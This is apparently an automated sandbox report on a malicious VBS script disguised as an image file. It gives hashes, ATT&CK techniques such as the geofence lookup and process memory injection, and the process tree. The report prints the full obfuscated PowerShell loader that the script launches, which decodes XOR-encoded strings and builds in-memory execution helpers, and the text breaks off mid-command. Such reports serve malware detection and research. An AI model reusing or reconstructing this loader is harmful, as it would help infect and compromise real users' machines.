944ec33501f9b53d38b20bef079216d2e73555fdcf38dbbc5bfc00ad32832a64

General

Target

IMG_2022112022-6468.vbs
Size

403KB
MD5

8559b627480c3e559a6a77c4dd83948c
SHA1

038eebc7845b13eeabee4e56bfb855e1f9e65c65
SHA256

944ec33501f9b53d38b20bef079216d2e73555fdcf38dbbc5bfc00ad32832a64
SHA512

79526c18cc44ac487a449a29aaaf7399dda3a74937a72eb9e6d518d08051e791eb11c4793d3e4724788110083477c0cb604efc16a21d26ee3020f795e58fb8f8
SSDEEP

6144:if94pQHNvzyY8dT9FY03hQo7KieMqVkT6hqkGOACCXL:I9UsNvzyNdJ5iomndVS6UlX

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

5056 powershell.exe
5056 powershell.exe
2064 powershell.exe
2064 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 5056 powershell.exe
Token: SeDebugPrivilege 2064 powershell.exe

pid	process
5056	powershell.exe
5056	powershell.exe
2064	powershell.exe
2064	powershell.exe

description	pid	process
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4264 wrote to memory of 5056	4264	WScript.exe	powershell.exe
PID 4264 wrote to memory of 5056	4264	WScript.exe	powershell.exe
PID 5056 wrote to memory of 2064	5056	powershell.exe	powershell.exe
PID 5056 wrote to memory of 2064	5056	powershell.exe	powershell.exe
PID 5056 wrote to memory of 2064	5056	powershell.exe	powershell.exe
PID 2064 wrote to memory of 4924	2064	powershell.exe	powershell.exe
PID 2064 wrote to memory of 4924	2064	powershell.exe	powershell.exe
PID 2064 wrote to memory of 4924	2064	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IMG_2022112022-6468.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Avifaunally = """BeFTauUnnRacBytAlireoAsnMe BeHOnTReBSh ca{fl Cy Ym Un FopveaHerInaTamCr(Br[SkSButstrThiKonBagFa]Se`$AsHcoSAc)sl;Kl Ag Li Vi At`$HaBCiyBitKeeLgsDa Pi=Ex JeNsaeLywdi-FoOTrbHyjPaeTecKltne SebHeysltFieMe[Be]Un St(am`$GuHPiSSu.RoLAzeDanPrgSttSuhha Be/Pr Ti2Pe)Pa;Ma Tr Ko Ak KlFAnomyrRi(Be`$Elivo=Ut0Op;Sk fr`$ViiUb Da-BrlEvtNe Li`$NeHVrSRe.paLOreponOvgGrtRehLe;Bo Re`$koiAc+Ef=Dr2Yp)Bc{An Ca St Pe Fo In Ma Ox Pr`$FoBpyyEgtKieMasCh[Pl`$ShiDe/Th2Co]Ba Fy=Ne Sa[MecApoBenUvvFoeBerAktRi]Bo:Ga:FlTBaoFuBtiyIltUdeRu(St`$ShHPeSCl.toSPrustbFusMetBarmeiHenIngCo(Gl`$SpiCe,Se Ba2Tr)bi,Pi co1Fr6No)Pu;la Sa Tu`$ArBKayEmtKoeBosUn[St`$CuiTe/Ne2La]Gu Ej=Ca Tr(No`$SvBSpyDetRaeFlsHa[Su`$Maiki/No2Bo]Fa In-TebKaxGroRerBr Ke2Li4Me3Li)Bu;Bu Jy Ad Do Kh}Ls Bl[AfSDutAsrImiUpnCagDe]Em[drSKlyrasFrtMueAfmMi.AnTSeeHixPrtFa.BoEUnnAecPaoStdBoiVinAdgBe]Om:Ga:SuAPuSAvCUnIGaINa.diGCoepotToSAmtParNeiOlnSagCo(La`$KrbChyOrtSueDosBy)An;Da}Pu`$BakVvaSukloiIneEutAfsFl0un=TuHskTPiBpt Un'RaAKe0af8ReASu8Op0Mo8Me7un9Ba6Tr9SiESaDofDHj9us7Fi9SpFXy9UnFSq'Ti;ro`$PekFeaApkAniHeeDitSpsTi1Tr=OvHSkTLaBan Is'ReBEmELi9PoAco9Ma0Eu8Mo1Lu9SvCTy8Fo0Ob9HaCWa9Ua5Bi8Ch7MiDMaDskAAf4Su9PeAKn9MaDKoCGr0JoCsm1SmDDiDOvAAr6Fi9poDgr8Ma0me9Pa2Si9Ne5Sl9Os6FlBPaDPo9Ma2Li8Pa7Sp9AlAUh8Fa5Si9Di6skBFaEBa9Ch6Ba8Pr7mi9UnBsv9TiCSk9Co7By8Ne0Ch'Ef;Sn`$mikunaAfkAuiBreEltKasNa2Po=alHRvTsaBSk Ma'InBOv4Ov9Ca6fr8Me7BoASa3hj8Sa1lo9FoCHo9Ca0PlBGr2Fo9Am7Ri9St7Jo8St1ac9Ho6Ca8Li0Ge8Ch0Un'pa;In`$BdkpeaPokStidvekrtOpsVl3Pr=StHUdTKlBSn Py'DeAPh0Sp8OrADg8Sl0Bl8Me7Fl9Un6Bl9BeEKoDTaDStAMe1Ba8Ac6ni9BeDTa8do7Va9CoAVe9caEKd9Hi6OpDFaDTrBEcAmi9FrDSt8St7Su9Dr6Ch8Ro1un9DiCRu8Sm3TaAmo0Fa9Fo6Ek8Pr1Sk8Re5en9RoAEr9ag0ok9fr6Ab8Ra0FaDReDCaBDoBPi9Ai2Bo9LaDBe9be7Bo9GeFAn9Sp6DiATi1As9Sk6Gr9Ka5Pr'Pr;Ri`$CakSkaUnkOviSweBatSasDu4Be=KlHCiTSlBst Id'Sc8Ve0Pl8Pa7Co8Sm1As9RiASy9RoDTu9Ud4Is'Vr;je`$BukSeaQukImiSkeRatTasba5In=IdHCaTTrBMr Sa'HaBKu4Pr9Fi6Se8In7GaBAnEAn9FoChy9Ph7Lu8Up6Kr9ReFKo9Vi6BeBPyBfo9Ly2In9HyDMo9cu7Ve9ArFAd9Ze6ki'Ud;Ul`$SkkAiaVikSkiHeeFotBosDe6in=AfHBeTAdBAn Pa'AlALe1SuASt7SkABl0Kl8Ch3Yo9Aa6Ci9Av0Sk9ReAfa9Sc2Ri9UnFSaBIgDBa9tj2To9PoECo9Ho6TiDFrFTrDfr3AuBPeBDe9AdACo9Se7No9Ud6InBBl1Ls8ReAstAPr0ra9UnABu9Ka4miDAtFSlDSu3ClADe3El8Mi6In9He1Sv9JaFNo9SuAPe9Fi0Sa'Kl;no`$PakGlaRekCaiEmeSvtDgsAf7un=StHIsTKaBAn Oc'SaAKn1Ka8Co6Un9keDSc8Ku7Po9IsASi9SmESy9Sk6FoDEkFInDAp3WeBFoETo9Fo2Sk9SuDSu9Kl2Re9ov4Sl9Ne6Un9Re7Sf'An;Di`$DekNiaMakUfiSteVitensKv8En=FrHCuTUdBAf Se'SeAOp1Li9Wa6Be9St5no9BaFOv9Mt6Sp9Su0Fo8Gi7Hy9Ov6kl9Ze7VmBSl7Ve9In6Lu9ReFRe9Ce6Te9De4kn9St2Op8Al7Sl9St6Ta'Ch;Pr`$KmkFoaMokOliIneWhtVksCl9Re=reHHeTPeBPa Ti'NoBSuASt9SmDInBMeEGy9Fa6Ma9FeECo9SwCto8Fr1Lu8NuASfBSlENa9SyCKr9Wa7Ad8Fl6Te9TrFFa9Ou6Po'Be;Sp`$MoDBriGraJogpenTioBasSktIniTrkPueCorAreRenTosLi6no5Ta0Gy=HoHOvTSaBUr Ve'HjBEkEDi8TiAEmBHa7Ta9Fa6Ko9LaFCr9ol6Gi9Ta4Ib9Af2Us8Ho7Sv9Au6IgACo7St8ChAHu8Kl3St9Ek6Ab'Fo;ho`$TiDKaiPratigPanTroChsFetFoiCokCoeEnrAneFunAlsbr6ag5Is1Pa=DiHAdTFoBKo Sk'IbBTe0fr9PaFLe9De2Cr8La0So8Gl0SnDOpFMiDBu3ReAPr3Ku8No6Vo9Ep1Ma9BeFga9BrADi9Be0PaDvaFFiDPr3boAAn0Pi9Hy6Ma9Pa2pe9PrFGr9Li6Ja9To7BeDFoFSeDpr3BlBSc2Li9SyDFl8Co0Bo9HaANoBUn0Pr9AgFTh9Ma2St8Ru0Ed8Bi0TvDFrFalDAl3SmBMa2no8Ag6Af8Ve7Ov9DeCWaBHo0El9StFEn9Ni2St8tu0Bl8Ch0Br'Re;Fe`$FoDTeiAfaFagRanKooEnsUntGriWekFieImrKeeClnPasRa6Hj5Sa2Ni=irHTeTFoBGr Ud'TwBstAUn9OpDDe8Ba5un9FaCUn9Ra8Pa9im6Si'Oc;Sl`$SlDTriSpaImgAmnGaoStsSmtAgiRekOpeTurCieTrnMisPs6Ga5Vr3St=KoHViTViBse Sm'MoARu3Bl8Tr6Un9Ta1Su9YuFBo9MaARe9Ba0CrDPrFStDDr3SkBBuBFe9ErAGo9Ce7Fo9So6beBSc1Sy8NoAVaADe0Mi9AmATe9Ef4OpDWeFAnDBe3GuBPrDDi9Ku6Un8Sc4UdASt0Qu9tiFUn9MaCBl8St7InDPaFSaDPa3abAFr5Vr9CoASt8Gy1Re8Di7da8Sm6Sn9Tr2Os9UnFTa'yp;Hy`$AnDSiiKaaTogTrnDeoSwsVetSkiStkKreLyrReeChnTosBe6Ha5Zo4Ac=suHafTPrBSd Er'RoAEb5Gj9NeASk8Co1Tr8Un7Sh8Pr6Do9Le2Pa9afFSuBra2To9GaFLa9UtFMi9ScCja9at0Lo'St;An`$GlDMyiViaPogHunBaoJosbrtSkiBrkDyeInrBeeLinVosDe6Af5Fo5Ci=SyHIaTBeBGr He'Fo9BiDGr8Au7Dr9St7Bu9CoFPl9KoFFo'Ek;Ja`$PeDUliWoasugPlnmaoResBrtReiMikEkeEprKveAunFisGl6Da5De6Ou=KaHDeTTyBTu Un'HoBSeDPr8Mi7AgATr3Ad8Sk1Gu9StCSl8pl7Pe9He6Br9Fa0Wi8En7UnAhu5pr9StAHo8Ek1pr8Sy7Sn8Af6Un9bo2Va9HaFVrBMeEVa9Ae6Le9OvEde9AtCDi8Sp1Va8ExAKa'In;Ar`$maDFaiNaaSegFinBaoAcsTotAniBakSueAfrZaeSmnMisSt6Ty5ha7Sa=VaHraTBrBTi Sc'BaBToAGiBUn6BoACaBTe'Br;Gr`$GrDKeiOmaKlgGlnMooSisSttLuiDaksteEkrkaeBunEmsVa6La5Pt8am=SkHtuTPsBAb Re'PoASuFMa'Id;BoSHeeUdtLi-DeASklBriGeaSmsTa Hy-PsnPeaMamreerd BiDBliWoaCegTanTroKrsTutsniExkKueHorAdeMonStsDo6Kl5Du9Wi Hv-AgvFlaOvlLiuAreUh He`$InDDeiBoaKegSnnInoApsEutSiiMokCaeVarRaeConBisMo6Re5As7Se;MofPauCrnErcBotkuiAroSpnSm LifSakNdpCh il{OsPKvaBorepaBimla Di(op`$MuvAp_FamDi,se Pa`$Bovbl_InpTy)Ba la Co Un Ja Ar;Ya`$HoSPocDoasarNosUndAcaudlMieko2Sn0Ma9Or0Sk Bl=fiHPaTSuBPo An'SaDFo7Da8qu5Ko8In6He9woDSp9PrEAkDPr3UnChaERoDDo3stDsiBInAsu8coBNo2So8Du3Be8Ir3CaBIn7Op9DrCBr9LyERe9Pa2Ox9PaAku9VaDAmACrEunCIn9PlCWh9SaBin0Ve8Es6Ko8To1Bl8Ou1Ak9ov6Ch9SuDFe8St7KoBHy7Fo9FaCTr9maELa9Ge2Co9giAop9GrDFeDStDFoBAr4Fi9Tr6Ar8Ot7WiBSe2Ha8Vi0Af8Sh0Sp9As6Ma9BuEHi9Bu1Sp9MiFSe9FoACe9Pa6De8Ba0BeDGrBTiDSeAKlDCr3Es8CoFPrDIs3DiAIr4pl9TaBWa9Kl6Pe8Fa1Hu9Tr6MeDFuEAtBVeCNo9Te1ca9Mo9Uv9Ot6La9Di0Pi8St7HaDan3Co8Di8RoDRu3BeDTa7BeAGrCCaDThDAnBve4Sl9ByFla9EnCCi9Ma1Fe9Es2Co9EfFUnBSu2Fl8Tu0Gl8ko0Ur9St6Fa9OvEHy9Li1Sn9FeFHa8CaAFlBRu0Re9ry2Pa9De0Co9SlBCh9Me6PhDBr3alDfrEAdBsy2Ad9WaDSu9de7PrDGe3KeDFo7VeABoCGeDacDReBOcFKe9EqCEf9Sc0Ci9Sk2Un8La7Th9BaAno9SaCTa9BaDDiDDiDCoABe0Ty8Fe3Ho9CyFSh9UnAUl8id7KeDHyBMuDLy7EvBBe7To9TrASi9Au2cl9Co4Bo9OvDun9KnCpl8Os0Sk8Mu7ha9SqANe9Ap8Ko9Gr6Sc8So1pa9Co6Si9EkDTa8Da0EnCom5AfCLa6SpCSmBMoDReAToAHj8UdDViESkCBr2LuADrEPlDCaDCuBbi6In8ra2Up8Ka6Ri9Co2Ve9CiFAr8Pa0SmDUnBDiDOv7me9br8Du9Su2Bo9Sp8By9LaATe9Tr6om8Pe7id8El0AnCGe3AbDUnAGeDga3Kl8fuEjaDUnASaDGlDNeBGr4Un9mi6Sj8No7RaADi7En8DeANo8St3Cr9Mi6WaDcrBUnDTr7de9De8Al9Kn2Am9Om8Al9BeAMo9Ch6Ta8sc7Ae8Po0VoCNs2FoDUnAMa'In;UnDMiiSmaIngUnnKioTusVitLaiRakGiePhrSueEunSlsSk6Ba5Fo9Sa Vr`$StSRecenaEcrHasIndSuaFjlGaeOf2Ke0lo9Ba0Ke;Sl`$SySBocSvaPrrTasKidHaaSclNaeDo2be0No9Tr5Ba Sn=Ku SpHAkTCoBSq Ep'UaDFr7Ra8Ps5de9Uv2Fe8Gl1FoASwCMi9Ka4Th8Gr3Bu9Eg2CyDFj3ApCBiEUnDBl3KrDka7Em8Fo5Sh8In6Fo9TaDFo9EnEGrDFlDBoBVi4Fo9Es6Da8an7CrBAdEDu9St6Ov8At7ne9reBBe9FsCBo9Pa7LeDRuBPrDSu7Lk9Dy8Nu9Fo2Le9Co8Lu9BeACo9Fa6Tr8Be7Sy8Ag0PeCIl1OpDPrFKrDBa3DiABe8KoARe7St8AfAMi8Ve3Di9De6AeASq8plAArESaAInEmeDCa3UpBJu3seDNoBUnDko7Fi9Si8St9Op2St9Fo8Bh9CoAps9Vi6No8Co7Va8Tr0ChCRa0slDCoFSaDPa3StDBe7in9ov8Mi9Fl2In9Fo8St9TeADe9Ca6Na8Fu7Tr8Sa0LaCSm7DvDSpANoDFdAMa'Ud;StDFeiApaAggTrnWuoVasSrtFoiTrkPaePrrRaeApnCosDv6Am5il9Un Ru`$TrSsicIlafrrMosPodUdaMalGleSu2Fn0Rg9Mi5En;Se`$ApSAdcReaUnrResFadDoaKulInePr2Un0Ro9In1vi Ba=Na idHFiTLuBFi Ri'my8Va1An9Ex6No8An7My8Tp6Sy8Al1Jo9BaDOrDFo3XaDPr7Ta8Ta5Af9Ek2Pu8De1BlAReCRe9Dd4Ti8Lo3Ti9Co2RaDOvDUdBRiACu9GaDKo8in5Kr9CeCCu9Si8Er9Al6TrDAnBAtDSe7Kr9MoDCr8ra6ru9wiFBe9RuFTrDjaFOlDMy3PiBTe3AlDovBGrASt8GeAAf0Ca8liAIn8el0Sk8ep7Sl9We6In9SeESoDDaDInAFr1Ud8Wa6St9suDSk8Fy7Ti9BlATe9DuELo9po6OvDMeDSkBInADe9IrDSu8Ma7ou9Bl6Vi8Se1Vi9PhCBk8Pe3RaAsu0St9Wi6Sp8Ky1Ji8ro5pa9BeAKo9In0Ko9Ko6ge8He0unDDeDEmBSuBGa9Fa2Ov9BaDGe9Ko7Op9MaFPo9Te6GaAEn1Cy9Se6Pe9Ba5PhAAfEInDOlBSuBenDSo9Pr6Be8Tr4FiDloEInBSuCJu9Kn1Fo9Ib9Dr9Ed6He9Sp0Mi8Se7MiDTr3FeARe0Cu8trAMe8ud0Es8Pu7Bu9Tr6Ca9BaEArDSnDAbAOp1fi8Ju6Pu9TaDSl8Bj7Pi9AfAAr9BeEUn9Po6SaDJuDGaBgoAJd9evDKn8Cy7Gu9Ca6Dy8Ph1Uf9FuCVa8No3MeACo0De9Re6Co8In1Pe8Wi5Un9SuABe9Be0dr9Uh6Je8Uk0BoDEvDUpBSpBCo9un2Fr9MuDsk9Li7Ul9TeFDe9Dr6TiACo1Ro9Ec6Ut9Ra5MaDsiBLiDlaBEkBRiDob9Fo6Ca8Wr4ToDOpEInBMeCsu9Tr1no9Fo9Su9Un6Be9Ku0su8Si7CoDOv3GuBStALa9IsDFr8Pa7PaATo3Uh8sa7He8Pe1DyDAaABiDFoFSlDUv3YpDCoBKnDPo7Pr8Fe5Su8Pa6Tu9SeDUf9DiEtiDFiDStBFy4Gi9Su6Tv8Ea7BlBGyESl9Hy6Un8Se7Sk9ViBSl9SeCWe9Ko7InDTeBTrDCh7St9Am8Sl9Fr2St9Vo8Di9TuAde9Os6Sp8Ma7Pu8An0ExCBr6GrDViATrDEuAMuDAlDBuBCeAKa9WiDmi8Un5Cu9DoCCh9Ka8Mu9Za6UfDLyBswDAv7Ly9AsDDg8Sn6Ch9HaFDr9DiFDeDSeFTaDHa3SsBBe3noDTuBSuDIn7Se8su5SpASuCpa9EmEFoDStAraDOmASmDSiAAxDRaAAvDBuFBnDHj3NoDPr7ov8Sk5PeAArCIn8Mo3PrDUnABoDFaAEr'fr;EnDFoiDaaHagKrnstoFisUrtAniNekSeeRerSteOvnHesab6of5Af9Pr Sc`$BiSTocfoaDorShsKedMiaPllHeeCl2Po0En9Di1Un;Ko}AgfEsuDanFjcTitBeiBooUnnBe AlGAnDToTNg Ri{PaPSaaGurAraBamRa An(Mo[DoPIlaCarUdaBamFoeLotGaeHurDe(TePTroAnsMoiAmtSoiSnoCanUd Ga=St Tr0Va,Sw DiMStaennBedFlaTotAroMurTeySl Tr=Fo Pr`$boTGdrSvuEueUd)Ae]co Sn[DeTSkyPepFaeMa[Pa]Fl]Eu Mb`$StvUnaMorRe_RapSaasprmuapamMieMatBaeAdrWhsBa,Bu[SpPBaaUnrreaArmBaeHutRoeSyrAl(FlPStoStsUniSotChiTyoFinUn Bi=Si Gr1Mi)Lu]Ta Pr[FrTAbyCipDieCo]Fr Bi`$DevUnrOztWo Ra=Gr Pr[PrVPhoIniPodAs]Be)Ra;Ov`$ToSNacsoaNerDosMydPraHalDaeSu2Be0Al9He2Ga ka=An JoHTiTGeBDe Du'UnDEs7HuAOv5LeAsp7MeBLe1SlDTa3FdCAbEAkDKa3SaAUn8SpBSy2Ga8Dr3Pr8Fu3KoBim7yn9daCSp9GiEVa9Ud2Ko9BrAAt9TeDTrAAnEBuCSa9PrCTr9LkBOp0st8Ov6So8Cu1Ru8Re1Ti9My6He9AzDOc8Pr7BiBDi7Be9EvCOv9saERe9Ad2Ch9MeASk9HaDexDOsDraBOs7Ba9Go6No9Sa5lh9UnAaf9BaDCh9ma6NdBVi7Fr8InASt9CoDTi9Mi2Pa9DeECo9PhADi9Fr0MuBTa2Gr8Vv0Br8su0St9Br6li9LoEFr9An1va9SeFBo8TrASlDBeBPoDErBFoBCoDAr9Ha6Be8Mn4WiDInECeBUnCSt9Op1Ex9Ud9Ce9Ad6Sa9Mo0St8Sm7TiDNi3UnAPe0Ve8FiASl8an0Ni8Tr7Af9si6Ra9PoESpDTeDToAKr1St9Ca6Kr9Ar5In9BrFKl9Wa6Sp9Eg0Ud8Al7No9SaACi9cyCSy9UnDPrDUnDSvBBu2Re8Ga0Ko8Pe0Sk9ra6Se9VeEPy9Ka1Be9FaFBi8BlAtrBIrDKn9Po2Pr9miESv9In6ObDEkBSkDub7st9Tr8Se9At2Vk9Aa8Ur9NiAKi9Pr6Do8Op7Be8ud0AnCCoBIrDMeABrDUnAThDMiFDiDMi3CuAKo8wyAMa0la8haACa8Au0Sr8Bl7So9Pa6Ci9KuEJoDMoDOxAin1Fo9Cu6Je9Rd5Sc9SwFGe9Da6Ac9Fi0Fu8Kr7Cy9UnAAf9BuCCh9FaDWaDThDPrBKi6Ud9UrEBo9InABe8hu7ReDTeDRhBBo2Ga8Se0De8Af0ab9la6Ka9beEUn9Ko1Ob9ChFTi8StANaBGr1Tr8Me6Ud9UnAFa9RiFKo9Ta7Bl9Po6On8co1QuBFr2Br9Sl0Ba9La0Pe9Po6Ga8ga0la8Sn0LaAEmEBuCMi9HeCPr9RaAHe1Sm8Sa6Bo9SiDTyDGrASkDufDEnBYu7Ma9He6Hu9As5Ba9EpAAr9MyDPe9Fi6CoBaf7Sa8AfARe9DaDta9Bl2Po9dmEud9TiAEp9Ar0HiBinELe9KrCFl9Fl7Ch8Ko6Di9BiFIn9Me6SvDBrBupDAf7En9Ab8Va9Ze2Af9Un8Kb9PuAEn9Kl6Ta8Pa7Su8Su0PrCBoAHoDReFSeDCo3HaDSk7In9Kn5Fr9Sp2Is9CoFAb8Be0Al9Af6RyDRaAArDDiDLaBTi7as9Ke6Un9Re5Al9PoAUn9ErDPa9To6StACh7Le8FoAPi8Wh3tp9Sp6CoDDaBInDGa7GeBCh7Un9OvAZa9Ne2Ma9Mi4Mi9BeDGa9CoCCe8Sn0Ch8Du7Ti9HoANo9Tr8Co9wa6Re8Ba1Pa9Co6Ou9BaDKl8La0OpCRe5koCIn6PuCHa3PaDSpFReDSp3TiDDu7SuBto7Kn9LoACo9Ko2Un9pa4ad9SpDFa9SiCHa8Un0ov8sv7Pr9diABa9Da8No9Ra6Sa8va1Aa9Op6Ni9BeDAd8Fi0AlCUi5PoCpo6DaCom2skDAnFCaDBe3OsAUn8SuAAs0Pl8BaAde8Se0Ra8Ka7Si9So6Be9PrEskDTrDchBStEMi8La6Kr9BlFMr8La7Co9InAUd9Va0Un9Tu2un8tu0En8Re7GeBBk7ca9Lb6Ha9SlFTi9Ca6Vu9Gl4Ud9Gr2Vi8Dy7Tr9sk6EuAUmEStDTrAPo'Gr;saDOriChaFegfrnMioBesSntAmiTikSpeEmrSceImnCasHa6Ud5Ac9Mo La`$IrSGocanaTvrResSndStaKilFaePe2Gr0Vi9Ov2Se;tw`$BrSOycGaaDerBosDrdPaaStlUdeHa2Ha0Ep9Eg3Sk Ne=Le ExHArTPeBPe Fi'SpDCr7TiADm5RuAAc7OvBSt1SoDRuDHaBDi7Po9Ps6Ry9Ta5Af9HoAWr9FoDMo9Mi6EaBGa0Se9ScCEn9jeDBi8Ir0Ch8Li7Ge8Hy1Dd8We6Po9Op0Hy8Mi7Un9FiCBe8Ar1BrDSoBJoDge7Pr9No8Sw9Ci2Pn9Uv8Ch9EfAdo9Er6Ha8Sv7Sr8Cy0SiCBl5ReDGoFPoDSo3BaAFr8FlAEs0An8afADr8Rh0Sl8Al7aa9He6Ov9SuEGrDUnDDaAUn1st9Un6Ek9Wh5dr9GoFHo9Ch6Ko9Ol0Ko8Tr7Po9EuACa9UnCSy9FoDLsDOvDKoBBe0We9Dw2Di9TeFCh9KlFGi9KaAUn9CaDDg9Di4CoBUr0Pr9LbCCl9WoDNe8Gr5Un9Sk6Ui9BoDag8Hj7Fo9GuACo9paCSa9DeDFj8Su0ReAUnEshCGa9SuCKo9InAAc0pa8St7Kn9Fl2Gi9HaDPl9Bo7Pe9Sa2Af8Aw1Si9Sc7LiDEjFFlDWa3InDVr7Fa8Di5ha9Ko2Dy8Co1OvASkCPr8Wh3Po9De2Em8Mo1Sv9no2Tr9SpENo9Bl6ju8Kr7At9Sd6Gn8Kn1Ko8Lu0DoDUnASeDdaDTrAge0Co9Ep6To8In7CaBSpAVi9FoEUn8Sk3We9DrFTi9Fi6Ou9ZiESk9An6Ti9knDBi8Un7Sk9Ja2Ti8Fi7Tr9OpASp9SoCTi9EuDKiBMe5Lo9RaFtv9Te2Di9Ho4Fy8Sv0BiDPrBArDFo7Vi9Mi8Ku9De2In9Si8Ko9HaASk9Ta6Mi8Sa7Ad8An0caCGl4soDUnABu'Fu;AnDAriTraSegHunKaoPjsGltImiFekAmererreeFonNosse6Re5If9bi Dh`$LySSucSaakorKosKvdAtaMilSpeMo2Fa0Pr9No3Op;Fa`$CoSTrcReaDrrHesBydPiaLilOuesk2Be0pr9re4Bo Go=St LuHAbTKlBOv Da'ExDSu7DeAIn5HoAUd7reBTa1BoDChDFoBSt7Ny9Sy6Pr9Un5Un9LiAFu9FrDSn9Op6DeBStEHo9Ly6Wo8Mo7Te9DaBGa9HeCSt9Mi7MeDDeBDaDVa7JuBSt7Ha9WaANy9An2In9Un4Sk9EpDLu9CrCUn8Be0Ma8Ud7Ba9LiAOx9Sk8Dy9Sc6ty8Di1Ma9Pl6Ba9HiDYn8Kr0KoCcr5PeCTr6InCef1ArDBdFUbDAr3BlDPu7UnBch7Mi9maARo9Co2Go9Tr4Ta9TaDFo9faCNs8Fr0Sk8Of7Br9PaASo9in8Zo9Sg6Pr8Di1Ek9Ci6Sk9SpDAg8Bo0BeCRe5stCGi6DeCAn0StDSiFRkDFo3SaDKa7Af8Hu5Sh8fy1Or8Ca7TrDsaFSaDKo3SaDPy7Pr8De5Te9Pe2Oe8Un1InAUgCEx8gi3Ko9Fo2Bl8Fa1Sc9Lr2Be9noEHy9Ch6St8Pr7Tj9ga6Tr8Fr1Ho8Co0LeDDoApeDOuDStAHj0Fe9Un6Mi8Gr7TrBPsAfo9MiEIm8Me3De9ScFCh9Et6Id9EsETw9Po6Sp9FlDSt8Pa7Le9Di2Na8ch7Ko9GrAUp9KaCEk9FaDReBUd5No9udFRe9De2lo9Op4Ek8Co0InDBaBAdDUn7si9Tk8Dh9li2Be9Go8Pa9TjAAb9Ku6Li8Me7To8La0UdCRa4RaDSkAMo'su;ReDEniTaaSlgPenStoBoskbtUniBokTieRerPaeFonMasTo6Pe5Tr9Sp me`$ReSHocBeaPrrDesGydEkaColReeKl2Pr0Br9Ba4or;Er`$KaSShcCaasarTrsSpdSmaGelEueBo2Co0Bi9fr5Ra Ad=Si CoHUnTSlBPr Kv'Ha8Un1Ch9Pr6St8Pe7Ha8Ko6Un8Te1Re9FrDStDUd3geDSl7MiABa5LkADe7MaBmu1EkDUdDEqBSp0Fi8Ep1Kl9We6ri9Gr2Ju8Of7Sc9Bu6anAFy7To8UdARe8Br3Gr9Le6BaDruBDuDRiADi'Ma;LeDDeiCuaHagBonDeocesBatMeiStkSueVarTrePrnArsCo6Ga5Mo9Ci Sn`$slSIscToaInrPrsEldUnaBelVieMd2Dr0Tr9Ga5Vl Ha An Br;oe}Un`$UdkSpkAf Un=Pr EnHWaTCaBSa Do'Ro9Sh8He9Pl6Be8St1Ke9CrDTh9Lf6Re9PoFsmCOm0UrCtu1Ov'Su;Fo`$KrSMicPraLorResChdAfaChlNieMe2Ac0In9Un6Su Pl=Re SiHSaTKoBAm Re'DiDFy7as8Ce5cy9Ma2Dj8No1HjACaCKa8Sk5Xe9No2UdDBa3SgCWaEArDBu3DiATr8LaASa0Af8piAKn8Py0Di8Ar7Be9Ba6Se9NoEboDRaDNaAOp1Le8Ph6Pr9LiDKi8ma7Ap9GeAin9InEBe9Op6BaDLoDFrBUnANd9TiDhm8De7Su9aa6Ak8Di1Al9HeCDa8Ra3GlABi0Ne9Po6In8Is1Os8Sk5Di9luAHe9Fa0Or9Un6Hv8Kj0LyDLuDGaBStEBk9En2Lu8Cr1An8Sm0Th9TiBen9Id2Ve9OaFSoADeEBeCGi9zoCEn9SkBIm4De9Lr6Ti8Ve7OrBCo7Pa9Sk6Ko9AfFHo9No6Af9Ef4Th9Ru2su8Ur7Ve9Co6KaBby5Af9UnCSl8St1FeBBr5Re8Sp6No9ArDUn9Se0Ga8Di7ch9PlACu9SpCTi9unDRiASe3Pa9LsCen9MoAMa9OrDSh8Co7Ga9Bu6Mu8Ge1SeDUnBBiDMuBTe9mo5Fi9Ov8br8Ti3TiDSo3SkDGe7Ti9Vi8Te9Fa8UnDKr3HoDHa7UpBDr7pr9ToAOv9Pu2Ls9Fo4Ma9CaDLe9PeCFa8Sy0Ko8Be7Li9snADi9Ba8Ba9Gu6Sy8Pu1Eq9Un6Bu9fiDTj8ov0AgCEl5MoCIs6SpCFa7BaDReAOpDboFbrDsl3SvDSoBJaBVa4jeBMa7KuAul7MaDHy3MiBRi3PaDPhBBeAMo8SoBInAMe9MoDSa8Va7woAAu3Ar8Gu7Ti8Hu1BaADiEHoDdeFSvDEk3VaARe8SeAbo6RuBOvAYo9AfDSp8Pr7NoCEv0LyCBe1BeATiENuDSoFHaDVa3FaAAc8PrADe6CoBPaAGa9kaDTr8Ra7scCsk0MaCVa1OpAAnEInDJuFLeDny3TiAEj8ByAAu6HaBHyApr9nuDCa8ba7JaCPr0PiCUd1InAMaEOrDReACiDTi3RuDAnBFrASk8seBMiAti9RsDMa8An7StACa3Pr8Sk7De8Ma1TrABrEUcDTrASnDDiASkDCoAGu'Sk;PeDAsiFlaFugTenSuoAnsFjtBeiaakAneScrNeeUnnFusSt6Si5Tr9Sa Va`$WiSOucTeaPerInsBrdTaaHalUnePr2Os0Co9Pa6Re;Pe`$FjvKiaCarCo_AknVetPr Fa=Pr SefBrkBepKo un`$AnDSmiCoaJogStnLooUnsDrtStiRukBaeIsrOeeCanCrsPo6kr5Sw5Ex Vi`$FlDAaiCaaThgYnnTroScsBetGriDukmieBarEleTenVusFr6Br5Te6Da;Co`$beSOrcOuaLorBesAkdNoaPhlCaeGi2Be0Th9Un7Fr St=Ma UnHBeTViBUn 